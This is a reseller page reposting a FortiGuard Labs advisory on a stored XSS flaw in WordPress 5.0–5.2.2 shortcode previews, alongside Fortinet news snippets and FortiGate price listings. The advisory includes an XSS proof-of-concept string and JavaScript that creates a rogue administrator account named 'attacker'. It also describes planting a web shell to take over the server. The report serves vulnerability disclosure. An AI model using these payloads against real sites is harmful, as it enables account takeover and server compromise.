Fortinet announced the expansion of its Universal SASE offering to empower today’s hybrid workforce with FortiOS everywhere. “The Fortinet operating system, FortiOS, is the industry’s only enterprise-grade converged operating system able to support all SASE functions, including firewall, SD-WAN, secure...
Fortinet - WordPress (Core) Stored XSS Vulnerability
FortiGuard Labs Breaking Threat Research
WordPress is the world’s most popular Content Management System (CMS). It has 60.4% of the global CMS market share, which is far higher than the second-place Joomla!, which only has 5.2% of the market share. As a result, over a third of all of the websites on the Internet were built using WordPress.
This stored XSS vulnerability affects WordPress versions from 5.0 to 5.2.2.
In WordPress 5.0, users can add Shortcode blocks to a post. When adding certain HTML encoded characters like “<” to the Shortcode block and then re-opening this post, it shows an error message and previews it by decoding the “<” to “<”.
Figure 1. Inserting HTML encoded characters into a Shortcode block
Figure 2. A Shortcode error message with preview
The XSS filter in this preview can be easily bypassed with the PoC “"><img src=1 onerror=prompt(1)>”.
Figure 3. Inserting PoC code into the Shortcode block
When any victim views this post, the XSS code will be executed in their browser.
Figure 4. WordPress Shortcode Preview XSS
If the victim happens to have admin rights, the criminal could then exploit this vulnerability to gain control of the administrator’s account, leverage the WordPress built-in function to GetShell, then take control of the server.
- // Send a GET request to the URL '/wordpress/wp-admin/user-new.php', and extract the current 'nonce' value
- var ajaxRequest = new XMLHttpRequest();
- var requestURL = "/wordpress/wp-admin/user-new.php";
- var nonceRegex = /ser" value="([^"]*?)"/g;
- ajaxRequest.open("GET", requestURL, false);
- var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);
- var nonce = nonceMatch;
- // Construct a POST query, using the previously extracted 'nonce' value, and create a new user with an arbitrary username / password, as an Administrator
- var params = "action=createuser&_wpnonce_create-user="+nonce+"&firstname.lastname@example.org&pass1=attacker&pass2=attacker&role=administrator";
- ajaxRequest = new XMLHttpRequest();
- ajaxRequest.open("POST", requestURL, true);
- ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Figure 5. Inserting XSS code to add an administrator account
Once a victim with high permission views this post, the administrator account “attacker” will be created.
Figure 6. XSS code is executed
Figure 7. The “attacker” account with administrator permission created by the XSS code
The attacker could then modify an existing php file to a webshell and use the webshell to take control of the webserver.
Figure 8. Adding a web shell with the attacker’s account
Figure 9. Taking control of the webserver
FortiGuard Labs contacted WordPress about this zero-day discovery, and they have issued a patch. All users of vulnerable versions of WordPress are encouraged to upgrade to the latest WordPress version or apply the latest patches immediately.
Additionally, organizations that have deployed Fortinet IPS solutions are already protected from this vulnerability with the following signature:
More Fortinet News Posts
Fortinet adds new security, management features to its SASE platform FortiSASE can now link SASE resources to SD-WAN apps via multiple Fortinet SD-WAN hubs. The company has exanded its Secure Private Access offering that ties SASE resources together with SD-WAN-based...
Fortinet unveils custom ASIC to boost firewall performance, efficiency Fortinet’s new custom chip, the FortiSP5, will power its converged network and security devices. Fortinet is introducing a new ASIC that promises to meld the security and network functions of its...
Original price $788.62 - Original price $6,269.97Original price$788.62 - $6,269.97$788.62 - $6,269.97Current price $788.62
The FortiGate/FortiWiFi 40F series provides a fast and secure SD-WAN solution in a compact fanless desktop form factor for enterprise branch office...View full detailsOriginal price $788.62 - Original price $6,269.97Original price$788.62 - $6,269.97$788.62 - $6,269.97Current price $788.62
Original price $0.00 - Original price $4,526.51Original price $0.00$1,217.90 - $4,526.51$1,217.90 - $4,526.51Current price $1,217.90
Fortinet FortiGate FG-60F Network Security/Firewall Appliance - 10 Port - 10/100/1000Base-T - Gigabit Ethernet - 200 VPN - 10 x RJ-45 - Desktop T...View full detailsOriginal price $0.00 - Original price $4,526.51Original price $0.00$1,217.90 - $4,526.51$1,217.90 - $4,526.51Current price $1,217.90
Original price $2,098.42 - Original price $9,916.59Original price$2,098.42 - $9,916.59$2,098.42 - $9,916.59Current price $2,098.42
Fortinet FortiGate Network Security/Firewall Appliance - 10 Port - 1000Base-T - Gigabit Ethernet, 1000Base-X - AES (256-bit), SHA-256 - 200 VPN - 1...View full detailsOriginal price $2,098.42 - Original price $9,916.59Original price$2,098.42 - $9,916.59$2,098.42 - $9,916.59Current price $2,098.42
Original price $3,703.08 - Original price $19,040.98Original price$3,703.08 - $19,040.98$3,703.08 - $19,040.98Current price $3,703.08
The FortiGate 100F series provides an application-centric, scalable, and secure SD-WAN solution with Next Generation Firewall (NGFW) capabilities f...View full detailsOriginal price $3,703.08 - Original price $19,040.98Original price$3,703.08 - $19,040.98$3,703.08 - $19,040.98Current price $3,703.08
Original price $4,468.38 - Original price $4,468.38Original price$4,468.38$4,468.38 - $4,468.38Current price $4,468.38
While traditional security solutions are designed and intended for the world of offices and corporations, the FortiGate Rugged Series offers indust...View full detailsOriginal price $4,468.38 - Original price $4,468.38Original price$4,468.38$4,468.38 - $4,468.38Current price $4,468.38